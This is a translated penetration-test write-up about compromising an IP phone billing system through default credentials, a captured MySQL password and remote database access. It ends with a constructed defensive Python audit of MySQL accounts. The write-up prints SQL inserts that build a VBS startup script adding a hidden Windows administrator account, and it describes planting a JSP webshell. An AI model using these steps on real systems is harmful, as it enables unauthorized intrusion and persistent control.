www.2cto.com: I am exhausted by human bypass. The author should pay attention to human bypass.
This write-up covers an intrusion test of an IP phone billing system: how to obtain a webshell when MySQL accepts external connections.
The website is like this.
The website runs on Tomcat and Apache.
Log in with the default account and password admin/admin.
I looked at it.
Engine management has an "access test" button for the MySQL database. Click it and capture the packets to obtain the plaintext of the password that the page masks with asterisks.
The request is sent as a GET.
This gives the MySQL database account and password: eccom/eccom.
Check whether port 3306 of the target website is open.
It is open, so try connecting from a Kali system.
Accessible
Check which databases are available.
The account can see the mysql database, so it has high privileges, possibly the same as root. So get the root password first, to work more comfortably.
Once decrypted, the root password turns out to be root as well. Log in as root.
There are three methods to escalate privileges: UDF, writing a Trojan, and the startup item. At first I did not know how to create the folder for the UDF, so I tried placing a VBS script that adds a user in the startup item:
mysql> insert into a values ("set wshshell=createobject (""wscript.shell"")");
mysql> insert into a values ("a=wshshell.run (""cmd.exe /c net user xiaowai 123qwe!@# /add"",0)");
mysql> insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators xiaowai /add"",0)");
But I did not know how to get this server to restart. With an overflow attack, the server will go down if a policy is configured. Afraid of breaking the system, I gave up on that and chose to find an absolute path and write a Trojan instead. The procedure is as follows. I first searched for the path. The path I found at first was incorrect, which wasted a lot of time.
The path here was incorrect, so all the Trojans were written to other folders.
While looking for the correct path, I tried escalating through FTP. FTP accepts a direct connection and has write permission.
However, it cannot execute commands, so I dropped FTP.
Back to business.
A directory scan turned up a log folder.
The absolute path is found.
Start writing the Trojan.
The trojan address is
Opening it shows a blank page, so the write succeeded.
I found a client for the one-sentence JSP Trojan.
Click to submit.
With a webshell, escalating privileges is easy. JSP Trojans generally run with high privileges.
End.
The account and the webshell have been deleted. No worries.
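The database side of this intrusion depended on account and server settings that an administrator can check directly. The following is an added example, not part of the original write-up: a Python audit over rows exported from mysql.user, flagging passwords equal to the user name, administrative accounts reachable over the network, and the FILE privilege combined with an unrestricted secure_file_priv. It assumes the mysql_native_password hash format; the row layout, the `billing` account and all sample values are constructed.

```python
import hashlib

def native_hash(password: str) -> str:
    """mysql_native_password format: '*' + HEX(SHA1(SHA1(password)))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

def is_remote(host: str) -> bool:
    """True when the account's host pattern admits non-local clients."""
    return host not in ("localhost", "127.0.0.1", "::1")

def audit(accounts, secure_file_priv):
    """Return sorted (user@host, finding) pairs for the weaknesses seen in this write-up."""
    findings = []
    for a in accounts:
        who = f"{a['user']}@{a['host']}"
        # Only the user name is tried as a candidate password (eccom/eccom, root/root).
        if a["auth"] == native_hash(a["user"]):
            findings.append((who, "password equals user name"))
        if is_remote(a["host"]) and (a["user"] == "root" or a["super"]):
            findings.append((who, "administrative account reachable over the network"))
        if a["file"]:
            # secure_file_priv: "" = no restriction, None (NULL) = file I/O disabled,
            # any other value = the only directory the server may read or write.
            if secure_file_priv == "":
                findings.append((who, "FILE privilege with unrestricted secure_file_priv"))
            elif secure_file_priv is not None:
                findings.append((who, f"FILE privilege limited to {secure_file_priv}"))
    return sorted(findings)

# Constructed sample rows, shaped like the result of:
#   SELECT user, host, authentication_string, File_priv, Super_priv FROM mysql.user
# (the hash column is named Password on older servers)
SAMPLE = [
    {"user": "root", "host": "%", "auth": native_hash("root"), "file": True, "super": True},
    {"user": "eccom", "host": "%", "auth": native_hash("eccom"), "file": True, "super": False},
    {"user": "billing", "host": "localhost",
     "auth": native_hash("constructed-long-passphrase"), "file": False, "super": False},
]

if __name__ == "__main__":
    for who, finding in audit(SAMPLE, ""):
        print(f"{who}: {finding}")
```

Pass the value of `SELECT @@secure_file_priv` as the second argument; a NULL result maps to `None`.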